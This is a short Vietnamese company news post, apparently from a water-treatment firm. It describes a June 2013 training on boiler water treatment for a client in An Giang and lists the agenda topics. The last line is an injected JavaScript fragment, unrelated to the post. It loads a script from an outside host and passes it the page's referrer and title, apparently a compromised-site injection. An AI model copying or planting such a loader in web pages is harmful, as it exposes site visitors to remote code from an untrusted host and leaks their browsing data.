Mon,18-06-2018

THỊNH PHÚ - 13.06.2013

Ngày 13.06.2013 Công ty Long Trường Vũ đã thực hiện thành công buổi training về kỹ thuật xử lý nước lò hơi tại Khách hàng Thịnh Phú - An Giang.

 

Lò hơi: Các vấn đề thường gặp và giải pháp

 

Hướng dẫn kiểm soát chất lượng nước hàng ngày theo biểu mẫu

 

Hướng dẫn sử dụng thiết bị (bút đo pH, TDS)

 

Hướng dẫn test nhanh độ cứng nước cấp lò hơi

 

Thảo luận

 

Học viên thực hành

 

 

Hướng dẫn vận hành hệ thống làm mềm

s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';